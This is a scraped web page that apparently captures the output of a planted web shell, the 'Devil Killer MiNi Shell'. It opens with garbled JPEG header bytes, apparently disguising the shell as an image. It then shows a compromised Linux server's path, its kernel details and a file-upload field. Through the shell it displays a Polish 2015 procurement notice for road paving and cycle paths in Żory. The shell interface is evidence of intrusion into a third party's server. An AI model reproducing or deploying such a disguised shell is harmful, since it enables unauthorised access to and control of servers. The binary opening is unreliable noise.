JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150710/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150710/173536-N-2015.html

<p class="kh_header"><b>Żory: Wykonanie utwardzenia dróg w mieście Żory - etap II oraz budowa ścieżek rowerowych</b><br>
<b>Numer ogłoszenia: 173536 - 2015; data zamieszczenia: 10.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Żory , Al. Wojska Polskiego 25, 44-240 Żory, woj. śląskie, tel. 32 4348245, faks 32 4348248.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie utwardzenia dróg w mieście Żory - etap II oraz budowa ścieżek rowerowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie utwardzenia dróg w mieście Żory - etap II oraz budowa ścieżek rowerowych.

Zamówienie zostało podzielone na 4 części:

Część nr 1  Nawierzchnie z kostki brukowej:	
Zadanie 1 - Wykonanie nowej nawierzchni chodnika wzdłuż ul. Rybnickiej.
Zadanie 2 - Wykonanie nawierzchni parkingu z płyt ażurowych przy ul. Jubileuszowej.
Zadanie 3 - Wykonanie nowej nawierzchni chodnika przy pomniku Wojciecha Korfantego. 
Zadanie 4 - Wykonanie utwardzonych podestów brukowych przy dziewięciu urządzeniach siłowni zewnętrznej na os. Powstańców Śl. w Żorach.
Zadanie 5 - Wykonanie utwardzonych podestów brukowych przy siedmiu urządzeniach siłowni zewnętrznej na os. Pawlikowskiego w Żorach.

Część nr 2  Nawierzchnie asfaltowe:	
Zadanie 1 - Wykonanie przebudowy skrzyżowania Obwodnicy Północnej z ul. Wygoda (wykonanie lewoskrętu).
Zadanie 2 - Wykonanie nowej nawierzchni asfaltowej odcinka drogi ul. Pukowca.
Zadanie 3 - Wykonanie nowej nawierzchni asfaltowej odcinka drogi ul. Głównej.

Część nr 3  Utwardzenie nawierzchni kruszywem tłuczniowym:
Zadanie 1 - Wykonanie utwardzonej nawierzchni drogi wraz z liniowym odwodnieniem ul. Srebrnej.
Zadanie 2 - Wykonanie utwardzonej nawierzchni drogi ul. Durantów. 
Zadanie 3 - Wykonanie utwardzonej nawierzchni drogi ul. Karpackiej.
Zadanie 4 - Wykonanie utwardzonej nawierzchni odcinka drogi ul. Poziomkowej.

Część nr 4  Budowa i oznakowanie ścieżek rowerowych:
Zadanie 1 - Wykonanie oznakowania pionowego i poziomego
Zadanie 2 - Wykonanie poszerzenia nawierzchni z kostki brukowej chodnika przy Al. Wojska Polskiego wraz z przejściami 
Zadanie 3 - Wykonanie poszerzenia nawierzchni z kostki brukowej chodnika przy ul. Folwareckiej wraz z przejściem 
Zadanie 4 - Wykonanie poszerzenia nawierzchni z kostki brukowej chodnika przy Al. Niepodległości wraz z przejściami 
Zadanie 5 - Wykonanie poszerzenia nawierzchni z kostki brukowej chodnika przy ul. Boryńskiej 
Zadanie 6 - Wykonanie poszerzenia nawierzchni z kostki brukowej chodnika przy ul. Dąbrowskiego 
Zadanie 7 - Wykonanie poszerzenia nawierzchni z kostki brukowej chodnika przy ul. Górne Przedmieście wraz z przejściem 
Zadanie 8 - Wykonanie nowej nawierzchni asfaltowej chodnika wzdłuż ul. Jubileuszowej wraz z poszerzeniem do 3,0m 
Zadanie 9 - Wykonanie nawierzchni asfaltowej chodnika przy ul. Rybnickiej wzdłuż ogrodzenia szkoły ZSBI w Żorach 

Zamawiający dopuszcza możliwość składania ofert częściowych.
Część nr 1  Nawierzchnie z kostki brukowej: 

- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- rozbiórka istniejących nawierzchni brukowych oraz asfaltowych,
- rozbiórka krawężników oraz obrzeży betonowych na ławie betonowej z oporem,
- załadunek i wywóz materiałów z rozbiórki nawierzchni, krawężników i obrzeży betonowych na wysyp (z potwierdzeniem odbioru i opłatą za składowanie), kostkę brukową nadającą się do ponownego wykorzystania po ułożeniu na paletach przewieźć do ZTK Żory, ul. Okrężna 5 za pokwitowaniem,
- korytowanie pod nowe nawierzchnie brukowe,
- załadunek i wywóz materiałów z korytowania,
- wykonanie nowej podbudowy tłuczniowej lub wyrównanie istniejącej podbudowy warstwą kruszywa łamanego pod nawierzchnie brukowe,
- ułożenie nowych obrzeży betonowych 8x30cm na ławie betonowej z oporem,
- ułożenie nowych krawężników betonowych na ławie betonowej z oporem,
- wykonanie nawierzchni brukowych chodników, podestów z kostki brukowej betonowej wibroprasowanej gr. 6cm oraz gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara i czerwona bezfazowa, starobruk szara i czerwona,  kostka via castello pastello, kostka farmerska),
- wykonanie nawierzchni brukowych parkingu z płyt betonowych ażurowych gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, ażury w całości wypełnione grysem granitowym,
- regulacja pionowa studzienek oraz zasuw wodociągowych,
- zabezpieczenie rurą ochronną istniejącej sieci elektrycznej (w miejscach kolizji z parkingiem),
- montaż w sposób trwały do podłoża, na fundamencie betonowym elementów małej architektury - ławki, kosze na śmieci,
- wykonanie organizacji ruchu - montaż znaków drogowych,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- badania nośności podłoża gruntowego,
- humusowanie pobocza z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych.

Część nr 2  Nawierzchnie asfaltowe:

- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- rozbiórka istniejących nawierzchni brukowych oraz asfaltowych - frezowanie istniejących nawierzchni bitumicznych,
- rozbiórka krawężników oraz obrzeży betonowych na ławie betonowej z oporem,
- załadunek i wywóz materiałów z rozbiórki nawierzchni, krawężników i obrzeży betonowych na wysyp (z potwierdzeniem odbioru i opłatą za składowanie), kostkę brukową nadającą się do ponownego wykorzystania po ułożeniu na paletach przewieźć do ZTK Żory, ul. Okrężna 5 za pokwitowaniem,
- załadunek i wywóz materiałów z rozbiórki nawierzchni bitumicznych (pozyskany frez) do ZTK Żory, ul. Okrężna 5 za pokwitowaniem,
- korytowanie pod nowe nawierzchnie asfaltowe,
- załadunek i wywóz materiałów z korytowania,
- wykonanie nowej podbudowy tłuczniowej lub wyrównanie istniejącej podbudowy warstwą kruszywa łamanego pod nawierzchnie asfaltowe,
- formowanie i zagęszczenie nasypów, przesunięcie rowu odwadniającego drogę (zgodnie z dokumentacją projektową dla zadania nr 1),
- ułożenie nowych obrzeży betonowych 8x30cm na ławie betonowej z oporem,
- ułożenie nowych krawężników betonowych na ławie betonowej z oporem,
- wykonanie nawierzchni z mieszanek mineralno-bitumicznych (warstwa wiążąca oraz warstwa ścieralna z betonu asfaltowego) lub z mieszanek mastyksowo - grysowych,
- regulacja pionowa studzienek oraz zasuw wodociągowych,
- wykonanie odwodnienia dróg: montaż kompletnych betonowych wpustów ściekowych ulicznych z osadnikiem, podłączenie wpustów ulicznych do istniejących studni kanalizacji deszczowej przykanalikami z rur PVC jednowarstwowych litych typu ciężkiego S klasa SN8 SDR34 dz200, włączenie poprzez wykonanie przejścia szczelnego,
- wykonanie organizacji ruchu - montaż znaków drogowych, oznakowanie poziome,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- badania nośności podłoża gruntowego,
- humusowanie pobocza z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych.

Część nr 3  Utwardzenie nawierzchni kruszywem tłuczniowym:

- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- wykonanie korytowania po trasie nowej nawierzchni utwardzonej drogi,
- załadunek i wywóz materiałów z korytowania na wysyp (z potwierdzeniem odbioru i opłatą za składowanie),
- przeoranie (zbronowanie) istniejącej nawierzchni utwardzonej drogi do głębokości 10-15cm na całej szerokości jezdni, wyrównanie, uwałowanie i zagęszczenie nawierzchni istniejącej drogi - dotyczy ul. Srebrnej,
- profilowanie i zagęszczenie podłoża oraz wykonanie utwardzonej nawierzchni drogi z kruszywa tłuczniowego  gr. 35cm:
a) warstwa konstrukcyjna podbudowy z kruszywa łamanego stabilizowanego mechanicznie (fr. 32-63mm) o gr. 25cm,
b) warstwa klinująca z kruszywa łamanego stabilizowanego mechanicznie (fr. 0-32mm) o gr. 10cm, 
na ul. Srebrnej tylko warstwa klinująca z kruszywa grysowego,
- wykonanie odcinka drenażu wraz z montażem studni rewizyjnych,
- regulacja pionowa studzienek oraz zasuw wodociągowych,
- zabezpieczenie rurą ochronną istniejących sieci elektrycznej, wodociągowej, gazowej (w miejscach kolizji z nawierzchnią tłuczniową),
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- ręczne plantowanie poboczy i porządkowanie terenu.

Część nr 4  Budowa i oznakowanie ścieżek rowerowych:
- organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu (jeżeli będzie wymagana),
- rozbiórka istniejących nawierzchni brukowych oraz asfaltowych,
- rozbiórka krawężników oraz obrzeży betonowych na ławie betonowej z oporem,
- załadunek i wywóz materiałów z rozbiórki nawierzchni, krawężników i obrzeży betonowych na wysyp (z potwierdzeniem odbioru i opłatą za składowanie), kostkę brukową nadającą się do ponownego wykorzystania po ułożeniu na paletach przewieźć do ZTK Żory, ul. Okrężna 5 za pokwitowaniem,
- korytowanie pod nowe nawierzchnie brukowe,
- załadunek i wywóz materiałów z korytowania,
- wykonanie nowej podbudowy tłuczniowej lub wyrównanie istniejącej podbudowy warstwą kruszywa łamanego pod nawierzchnie brukowe,
- ułożenie nowych obrzeży betonowych 8x30cm na ławie betonowej z oporem,
- ułożenie nowych krawężników betonowych na ławie betonowej z oporem,
- wykonanie nawierzchni brukowych chodników, podestów z kostki brukowej betonowej wibroprasowanej gr. 6cm oraz gr. 8cm na podsypce cementowo- piaskowej gr. 3cm, rodzaj kostki (prostokąt szara i czerwona bezfazowa, starobruk szara i czerwona,  kostka via castello pastello, kostka farmerska),
- regulacja pionowa studzienek oraz zasuw wodociągowych,
- pełna obsługa geodezyjna (okazanie granic działek drogowych, pomiar geodezyjny powykonawczy),
- badania nośności podłoża gruntowego,
- humusowanie pobocza z obsianiem trawą,
- porządkowanie terenu po robotach budowlanych.
- wykonanie nawierzchni z mieszanek mineralno-bitumicznych (warstwa wiążąca oraz warstwa ścieralna z betonu asfaltowego) 
- montaż znaków drogowych pionowych - podzielony na dwa etapy realizacji zgodnie z  przedmiarami,
- wykonanie oznakowania poziomego - podzielony na dwa etapy realizacji zgodnie z przedmiarami,
- montaż słupków oddzielających i wydzielających ścieżki rowerowe:
a) Słupki blokujące typu A, ozdobne,  z tworzywa sztucznego w kolorze czarnym, barwionym w masie. Wysoka wytrzymałość mechaniczna, wysoka elastyczność - odporność na uderzenia. Po najechaniu samochodem słupek winien powrócić do pozycji pionowej, bez wyraźnych odkształceń Średnica  słupka nie mniejsza niż 200 mm, wysokość nad podłożem nie mniej  niż 1000 mm. Głębokość pod podłożem co najmniej 290 mm. Słupek powinien posiadać 3 taśmy odblaskowe w kolorze złotym i białym, umieszczone na obwodzie i w zagłębieniach słupka. 
b) Słupki blokujące typu B, ozdobne,  z tworzywa sztucznego w kolorze czarnym, barwionym w masie. Wysoka wytrzymałość mechaniczna, wysoka elastyczność - odporność na uderzenia. Po najechaniu samochodem słupek winien powrócić do pozycji pionowej, bez wyraźnych odkształceń Średnica  słupka nie mniejsza niż 150 mm, wysokość nad podłożem nie mniej  niż 1000 mm. Głębokość pod podłożem co najmniej 490 mm. Słupek powinien posiadać 1 taśmę dekoracyjną odblaskową w kolorze białym umieszczoną na obwodzie i w zagłębieniu słupka.  
Wymagania ogólne dotyczące robót drogowych		
- Regulacja wysokościowa istniejących studni kanalizacyjnych, teletechnicznych, włazów (pokryw) kanałów ciepłowniczych oraz zaworów wodociągowych, gazowych - w przypadku wystąpienia kolizji  z zakresem prac.
- Wykonawca w ramach zadania wykona i przekaże Zamawiającemu inwentaryzację geodezyjną powykonawczą z naniesieniem na zasoby geodezyjne przez uprawnionego geodetę w 3 egz. (odrębnie dla każdego zadania 
w częściach 1, 2, 3 i 4) - przedłożyć na dzień odbioru lub przedstawić poświadczenie z RZG o złożeniu materiałów z prac inwentaryzacyjnych.
- Roboty prowadzić zgodnie z instrukcją oznakowania robót prowadzonych w pasie drogowym, a w razie  konieczności opracować i zatwierdzić w wydziale Infrastruktury Miejskiej i Inwestycji Urzędu Miasta Żory projekt organizacji ruchu - realizuje Wykonawca a koszty uwzględnia w ofercie (koszty ogólne).
- W czasie wykonywania robót zapewnić dojazd i dojście do posesji.
- Wykonawca we wskazanych miejscach przez Zamawiającego wykona badania nośności podłoża gruntowego płytą VSS lub sondą dynamiczną (odrębnie dla każdego zadania w częściach 1, 2 i 4), wyniki badań zostaną dostarczone Zamawiającemu najpóźniej w dniu odbioru robót. Badania wykonać przy udziale przedstawicieli Zamawiającego.
- Wykonawca odpowiada za ochronę środowiska na placu budowy i w jego otoczeniu, podejmuje odpowiednie środki w celu zabezpieczenia dróg prowadzących do placu budowy przed zniszczeniem i zanieczyszczeniem spowodowanym jego środkami transportowymi. Po zakończeniu robót przywraca je do stanu pierwotnego.
- Stosowane materiały powinny posiadać atesty oraz deklaracje zgodności - materiały potrzebne dla celów realizacji przedmiotowego zamówienia są w gestii Wykonawcy.
- Masy ziemne, gruz i odpady powstałe w trakcie robót przekazać odbiorcy odpadu posiadającemu zezwolenie na prowadzenie działalności w zakresie odzysku odpadów zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 roku (Dz. U. z 2013r. poz. 21) lub wykorzystać we własnym zakresie zgodnie z posiadanym zezwoleniem na prowadzenie przetwarzania odpadów. Przekazanie odpadów należy udokumentować pisemnie.
- Wykonanie zasilania w energię elektryczną oraz wodę dla potrzeb placu budowy wg potrzeb oraz demontaż zasilania - realizuje Wykonawca a koszty uwzględnia w ofercie (koszty ogólne)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.00-2, 45.23.31.42-6, 45.23.32.22-1, 45.23.21.30-2, 45.23.11.10-9, 34.92.21.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Część 1 -   3.000,00 zł (słownie: trzy tysiące złotych 00/100)
Część 2 - 10.000,00 zł (słownie: dziesięć tysięcy złotych 00/100)
Część 3 -   6.000,00 zł (słownie: sześć tysięcy złotych 00/100)
Część 4 - 10.000,00 zł (słownie: dziesięć tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony , jeśli Wykonawca wykonał roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy  i doświadczenia w  okresie  ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, tj.
a)	dla części 1 co najmniej: 2 roboty budowlane polegające na budowie, przebudowie lub remoncie nawierzchni drogowej dla ruchu kołowego lub pieszego, z których każda obejmowała swoim zakresem wykonanie min. 120 m2 powierzchni z kostki brukowej
b)	 dla części 2 co najmniej: 2 roboty budowlane polegające na budowie lub przebudowie lub remoncie nawierzchni drogowej dla ruchu kołowego lub pieszego, z których każda obejmowała swoim zakresem wykonanie min. 300 m2 powierzchni z asfaltu
c)	dla części 4 co najmniej: 2 roboty budowlane polegające na budowie, przebudowie lub remoncie nawierzchni drogowej dla ruchu kołowego lub pieszego, z których każda obejmowała swoim zakresem wykonanie min. 120 m2 powierzchni z kostki brukowej oraz 2 roboty budowlane polegające na budowie, przebudowie lub remoncie nawierzchni drogowej dla ruchu kołowego lub pieszego, z których każda obejmowała swoim zakresem wykonanie min. 300 m2 powierzchni z asfaltu
oraz załączy dowody dotyczące najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 

W przypadku ubiegania się o udzielenie zamówienia na część 3 Zamawiający nie opisuje warunku udziału w postępowaniu.
W przypadku ubiegania się o udzielenie zamówienia łącznie na części 1, 2 i 4 lub 1 i 4 lub 2 i 4 wystarczające jest spełnienie tylko warunku określonego w punkcie c dla części 4.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wskaże osobę, które będzie uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialną za kierowanie robotami budowlanymi: w specjalności obejmującej uprawnienia do wykonywania dróg (uprawnienia w zakresie kierowania, nadzorowania  i kontrolowania budowy) wraz z informacjami na temat jej kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nią czynności, oraz informacją o podstawie do dysponowania tą osobą - w przypadku ubiegania się o realizację 1 lub więcej części.

Zamawiający dopuszcza aby ta sama osoba pełniła funkcję kierownika robót w przypadku ubiegania się o realizację więcej niż 1 części zamówienia.

Wykonawca oświadczy, że osoba, która będzie uczestniczyć w wykonywaniu zamówienia posiada wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

W przypadku osób posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane. Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed dniem wejścia w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy - w oparciu o art. 104 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. Z 2003 r. Nr 207, poz. 2016 ze zmianami).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
